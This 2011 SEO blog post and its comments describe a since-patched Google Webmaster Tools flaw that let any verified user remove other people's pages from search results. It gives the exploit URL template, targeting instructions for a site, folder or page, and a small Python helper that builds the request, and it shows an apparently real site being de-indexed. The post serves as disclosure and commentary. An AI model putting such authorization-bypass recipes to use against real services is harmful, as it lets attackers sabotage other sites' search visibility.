Google loophole – food for thought

by Peter Young on July 19, 2011 · 5 comments

It was during a quick beer this afternoon that my good friend Ryan Mckay told me about James Breckenridge’s post regarding the Google Webmaster Tools bug. For those that don’t know, there appears to have been a bug that allowed any verified Google Webmaster Tools user to remove pages, even if the site in question wasn’t under their direct jurisdiction. By simply typing in the following URL, you could wield power many negative SEOs only dream of:

https://www.google.com/webmasters/tools/removals-request?hl=en&siteUrl=http://{YOUR_URL}/&urlt={URL_TO_BLOCK}

By doing so you could block a whole site, a section or a single page, depending on how you entered the URL. To block a site, use the top-level domain (e.g. http://www.someurl.com/); to block a section (subfolder), use a subfolder URL (e.g. http://www.someurl.com/somefolder/); and to block a page, use the specific page URL (e.g. http://www.someurl.com/somefolder/somepage.html). As the Compare the Market meerkat would say – Simples.
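To illustrate just how little effort this took, here is a minimal sketch in Python of how such a removal-request URL could be assembled. This is not Google code: the endpoint and the siteUrl/urlt parameter names are simply lifted from the template above, the helper function is hypothetical, and the loophole has since been patched.

from urllib.parse import urlencode

REMOVAL_ENDPOINT = "https://www.google.com/webmasters/tools/removals-request"

def build_removal_url(site_url, url_to_block):
    """Assemble the removal-request URL quoted above.

    site_url     corresponds to the {YOUR_URL} placeholder
    url_to_block corresponds to the {URL_TO_BLOCK} placeholder
    """
    params = {"hl": "en", "siteUrl": site_url, "urlt": url_to_block}
    return REMOVAL_ENDPOINT + "?" + urlencode(params)

# A whole site, a subfolder or a single page - the only difference is the URL supplied:
print(build_removal_url("http://www.someurl.com/", "http://www.someurl.com/"))
print(build_removal_url("http://www.someurl.com/", "http://www.someurl.com/somefolder/"))
print(build_removal_url("http://www.someurl.com/", "http://www.someurl.com/somefolder/somepage.html"))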


[Screenshot: BingoplayUK before]

[Screenshot: BingoplayUK removal request]

[Screenshot: BingoplayUK now – 19/07/2011 23:02]

Now the fact that an unscrupulous user could do this is worrying enough – and whilst permanent deletion is unlikely given the way these removal requests work, this could still have had catastrophic consequences for any organisation that relies heavily on organic search for traffic. Just imagine if it had hit a site such as Moneysupermarket, which dominates the UK marketplace for many high-volume, high-cost terms such as mortgages, credit cards and car insurance. The exploitation of such a loophole could have been devastating.

Now imagine that self-same organisation held all your personal data. Oh, wait – with recent developments, that is a real-life scenario. What is really worrying to me is the simplicity of the loophole: a simple change to the query string and one could make merry hay. There was no checking or validation against user data – as long as you were a verified Webmaster Tools user, that was good enough. That to me is a very worrying scenario, and one that, to be honest, makes me very conscious of the amount of data I am happy to give Google.

This may well just be a reality check. We have seen a lot of development from Google over the last year or so, to the point that it seems not a day goes by without another tweak, change or test. With that pace has to come a degree of risk in ensuring that all the i’s are dotted and the t’s crossed.

I have to commend Google on how quickly they reacted to the loophole – certainly by the time I was doing the State of Search Webmaster Radio show with Bas Van Den Beld and Roy Huiskes, the loophole had been patched. However, if this was a simple oversight, I seriously hope it’s a one-off, and perhaps a wake-up call that it only takes one mistake to see it all come crashing down.

Comments (5)

Adrian Land July 19, 2011 at 10:34 pm

Wow that is scary. Good spot.

Gary Bennion July 20, 2011 at 8:55 am

That’s amazing! Maybe Google have been so busy releasing Plus, Chrome networks, Panda and all the rest that they’ve started to lose sight of the basics?

Good post.

Azzam July 20, 2011 at 11:41 am

I actually attempted to replicate this and got hit by a 404 page in Google Webmaster Tools.

James Lowery July 20, 2011 at 8:26 pm

I can’t believe that this worked as it did. I’ve blocked folders and pages using the interface in GWT in the past, and Google stated that you needed to block with robots.txt.

Looks as though the bingoplayuk website is back in the results now.

Peter Young July 21, 2011 at 11:47 am

I understand this has now been patched.
